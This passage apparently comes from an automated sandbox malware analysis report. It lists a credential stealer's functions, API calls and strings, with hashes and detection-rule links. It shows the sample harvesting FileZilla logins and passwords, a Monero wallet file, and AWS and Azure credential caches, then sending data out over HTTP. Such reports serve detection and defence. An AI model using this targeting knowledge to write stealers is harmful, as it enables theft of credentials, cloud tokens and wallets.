                                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00BB0562
                                  • lstrcat.KERNEL32(?,profile: null), ref: 00BB0571
                                  • lstrcat.KERNEL32(?,url: ), ref: 00BB0580
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0593
                                  • lstrcat.KERNEL32(?,00BC1678), ref: 00BB05A2
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB05B5
                                  • lstrcat.KERNEL32(?,00BC167C), ref: 00BB05C4
                                  • lstrcat.KERNEL32(?,login: ), ref: 00BB05D3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB05E6
                                  • lstrcat.KERNEL32(?,00BC1688), ref: 00BB05F5
                                  • lstrcat.KERNEL32(?,password: ), ref: 00BB0604
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB0617
                                  • lstrcat.KERNEL32(?,00BC1698), ref: 00BB0626
                                  • lstrcat.KERNEL32(?,00BC169C), ref: 00BB0635
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BC0DB2), ref: 00BB068E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 1942843190-555421843
                                  • Opcode ID: b6bc9ea29daa098972bae7d41d01f105e0a9709d638a439343477f8f86932dae
                                  • Instruction ID: 521780408f22560c1c211fb72508210b7ff794dd4c0949d12d4aa57a7671fd29
                                  • Opcode Fuzzy Hash: b6bc9ea29daa098972bae7d41d01f105e0a9709d638a439343477f8f86932dae
                                  • Instruction Fuzzy Hash: FED1F971D10209ABCB04FBE4DD96EFE77B8AF14301F504598F502BA191DEB4AA46CB72
                                  Function 00BA5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                    • Part of subcall function 00BA47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BA4839
                                    • Part of subcall function 00BA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BA4849
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BA59F8
                                  • StrCmpCA.SHLWAPI(?,01410EE0), ref: 00BA5A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BA5B93
                                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01410E90,00000000,?,0140FF40,00000000,?,00BC1A1C), ref: 00BA5E71
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00BA5E93
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BA5E9A
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5EAF
                                  • lstrlen.KERNEL32(00000000), ref: 00BA5ED8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BA5EF1
                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00BA5F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BA5F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00BA5F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA5FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA5FBD
                                  • HttpOpenRequestA.WININET(00000000,01410F10,?,01410328,00000000,00000000,00400100,00000000), ref: 00BA5BF8
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • InternetCloseHandle.WININET(00000000), ref: 00BA5FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 874700897-2180234286
                                  • Opcode ID: abb9f23f947a01ebbbe393d4b8b1ccb227d9d9bc495f97a93609c1fd7f604a39
                                  • Instruction ID: 2d955d9c0d4e3e6eeba9d0938ebc2436eb5b469e367a26bee5830c80816419b1
                                  • Opcode Fuzzy Hash: abb9f23f947a01ebbbe393d4b8b1ccb227d9d9bc495f97a93609c1fd7f604a39
                                  • Instruction Fuzzy Hash: CA12DA71C20118BBDB15EBA4DCA5FEEB3B8BF14700F5041D9B106B6591EFB02A4ACB65
                                  Function 00BACEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BB8B60: GetSystemTime.KERNEL32(00BC0E1A,0140FD60,00BC05AE,?,?,00BA13F9,?,0000001A,00BC0E1A,00000000,?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BB8B86
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BACF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BAD0C7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BAD0CE
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD208
                                  • lstrcat.KERNEL32(?,00BC1478), ref: 00BAD217
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD22A
                                  • lstrcat.KERNEL32(?,00BC147C), ref: 00BAD239
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD24C
                                  • lstrcat.KERNEL32(?,00BC1480), ref: 00BAD25B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD26E
                                  • lstrcat.KERNEL32(?,00BC1484), ref: 00BAD27D
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD290
                                  • lstrcat.KERNEL32(?,00BC1488), ref: 00BAD29F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD2B2
                                  • lstrcat.KERNEL32(?,00BC148C), ref: 00BAD2C1
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BAD2D4
                                  • lstrcat.KERNEL32(?,00BC1490), ref: 00BAD2E3
                                    • Part of subcall function 00BBA820: lstrlen.KERNEL32(00BA4F05,?,?,00BA4F05,00BC0DDE), ref: 00BBA82B
                                    • Part of subcall function 00BBA820: lstrcpy.KERNEL32(00BC0DDE,00000000), ref: 00BBA885
                                  • lstrlen.KERNEL32(?), ref: 00BAD32A
                                  • lstrlen.KERNEL32(?), ref: 00BAD339
                                    • Part of subcall function 00BBAA70: StrCmpCA.SHLWAPI(01409BC0,00BAA7A7,?,00BAA7A7,01409BC0), ref: 00BBAA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BAD3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                  • String ID:
                                  • API String ID: 1956182324-0
                                  • Opcode ID: c00ef9d192fc5f2f25873f4e953912c51d58edda4f1ee40ea515112b3a0e5c24
                                  • Instruction ID: 13af1cb22b8747132e18e1065f45b7eb1bbb022219d5c38d84c06434e84cc4ac
                                  • Opcode Fuzzy Hash: c00ef9d192fc5f2f25873f4e953912c51d58edda4f1ee40ea515112b3a0e5c24
                                  • Instruction Fuzzy Hash: ADE1F871D10209ABDB14FBA4DDA6EEE73B8AF14301F104198F106B61A1DE75BE09DB72
                                  Function 00BAC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0140F020,00000000,?,00BC144C,00000000,?,?), ref: 00BACA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BACA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00BACA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BACAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BACAD9
                                  • StrStrA.SHLWAPI(?,0140EE10,00BC0B52), ref: 00BACAF7
                                  • StrStrA.SHLWAPI(00000000,0140EF60), ref: 00BACB1E
                                  • StrStrA.SHLWAPI(?,0140F858,00000000,?,00BC1458,00000000,?,00000000,00000000,?,01409CC0,00000000,?,00BC1454,00000000,?), ref: 00BACCA2
                                  • StrStrA.SHLWAPI(00000000,0140F798), ref: 00BACCB9
                                    • Part of subcall function 00BAC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BAC871
                                    • Part of subcall function 00BAC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BAC87C
                                  • StrStrA.SHLWAPI(?,0140F798,00000000,?,00BC145C,00000000,?,00000000,01409CE0), ref: 00BACD5A
                                  • StrStrA.SHLWAPI(00000000,01409D90), ref: 00BACD71
                                    • Part of subcall function 00BAC820: lstrcat.KERNEL32(?,00BC0B46), ref: 00BAC943
                                    • Part of subcall function 00BAC820: lstrcat.KERNEL32(?,00BC0B47), ref: 00BAC957
                                    • Part of subcall function 00BAC820: lstrcat.KERNEL32(?,00BC0B4E), ref: 00BAC978
                                  • lstrlen.KERNEL32(00000000), ref: 00BACE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00BACE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 787b3b3effc50de7d48b1518b4778e0a8c45dc8b55a3f12ba41b23d8b13b52e8
                                  • Instruction ID: 9edf7806dbb2d8786624138e16e47c0c5d90183431afc81c15bc38131e0e4466
                                  • Opcode Fuzzy Hash: 787b3b3effc50de7d48b1518b4778e0a8c45dc8b55a3f12ba41b23d8b13b52e8
                                  • Instruction Fuzzy Hash: C1E1D971D10109BBDB15EBA4DC96FFEB7B8AF14300F404199F106B6591EF706A4ACB62
                                  Function 00BB8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0140CD60,00000000,00020019,00000000,00BC05B6), ref: 00BB83A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BB8426
                                  • wsprintfA.USER32 ref: 00BB8459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BB847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00BB8499
                                    • Part of subcall function 00BBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BBA7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$?
                                  • API String ID: 3246050789-3278919252
                                  • Opcode ID: eed3751cf4221eea522ba5410f027c401c5bad1edf60e51a5c7610a34d52648b
                                  • Instruction ID: 657d83e8e34bfa60d736d1c6551039d2d9aeb2717b0f968a89daf50c73793f58
                                  • Opcode Fuzzy Hash: eed3751cf4221eea522ba5410f027c401c5bad1edf60e51a5c7610a34d52648b
                                  • Instruction Fuzzy Hash: D381DC71910218ABDB24EB54CC95FEA77B8FF48700F0086D9E10AA6190DFB56F85CFA5
                                  Function 00BB4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BB8E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00BB4DCD
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB492C
                                    • Part of subcall function 00BB4910: FindFirstFileA.KERNEL32(?,?), ref: 00BB4943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00BB4E59
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FDC), ref: 00BB4971
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC0FE0), ref: 00BB4987
                                    • Part of subcall function 00BB4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4B7D
                                    • Part of subcall function 00BB4910: FindClose.KERNEL32(000000FF), ref: 00BB4B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00BB4EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BB4EE5
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB49B0
                                    • Part of subcall function 00BB4910: StrCmpCA.SHLWAPI(?,00BC08D2), ref: 00BB49C5
                                    • Part of subcall function 00BB4910: wsprintfA.USER32 ref: 00BB49E2
                                    • Part of subcall function 00BB4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BB4A1E
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,01410FA0), ref: 00BB4A4A
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,00BC0FF8), ref: 00BB4A5C
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,?), ref: 00BB4A70
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,00BC0FFC), ref: 00BB4A82
                                    • Part of subcall function 00BB4910: lstrcat.KERNEL32(?,?), ref: 00BB4A96
                                    • Part of subcall function 00BB4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BB4AAC
                                    • Part of subcall function 00BB4910: DeleteFileA.KERNEL32(?), ref: 00BB4B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: e5bfe6cf22f8b31cb426f77d671bc0036d6fecbfc472f5d139fc213c4e0ee0c3
                                  • Instruction ID: 77e5e305a3e85a84d4fd06a4e220b5d924bc3d2331d54fb433b3c9e6302b3c53
                                  • Opcode Fuzzy Hash: e5bfe6cf22f8b31cb426f77d671bc0036d6fecbfc472f5d139fc213c4e0ee0c3
                                  • Instruction Fuzzy Hash: 7041737A94020867DB50F770DC87FED72B8AB65700F4048D8B585A61D2EEF497C98BA2
                                  Function 00BB9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BB906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
